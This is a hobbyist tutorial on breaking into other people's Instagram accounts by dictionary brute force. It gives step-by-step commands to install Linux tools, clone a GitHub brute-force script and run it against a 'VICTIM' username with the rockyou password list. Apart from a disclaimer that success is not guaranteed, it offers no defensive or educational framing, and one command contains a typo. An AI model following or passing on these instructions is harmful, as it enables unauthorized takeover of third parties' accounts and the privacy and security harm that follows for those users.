NOTE: Don’t expect that you can hack whatever account you want! This is just the demonstration of how it works! For 100% work, you need a deeper understanding of it!
So Hi, guys I am back here again with one more tutorial and one of the most awaited one, Hacking Instagram Accounts
Yeah you heard it right now this tutorial not gonna include hacking the database of Instagram or something very advanced
So let's start this
So the first thing you need is Kali Linux or Parrot Sec os or any other Linux OS
you can download parrot os from here https://parrotsec.org and Kali Linux from here https://www.kali.org/
Now let's start the guide
So the first thing you need is a net connection and brain and yeah don't forget Linux any distro or flavor
So let's start for the purpose of this tutorial I am gonna use the technique of brute force
Brute force is the technique of trying random passwords against a single user from a pre-defined character set or more specifically we can say I am going to talk about a dictionary attack so dictionary attack is an attack in which the passwords are saved in a file from where we try these passwords on a single user
1. Open Terminal
2.
apt update && apt ugrade -y
3. {installing git to clone repo}
apt-get install git
4. {installing python }
apt-get install python
5. {installing python3}
apt-get install python3
6. {changing directory to desktop}
cd Desktop
7 {This command will clone the github repo}
git clone https://github.com/Pure-L0G1C/Instagram
8 run
chmod +x Instagram
9 get the help menu
python instagram.py -h
10 Now just simply enter this command
python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file
[wordlist file comes already by default in linux or parrot just extract rockyou in /usr/share/wordlists and replace the path]
If the users password is in rockyou than this gonna work but if not than its your badluck but you can try other ways if you want.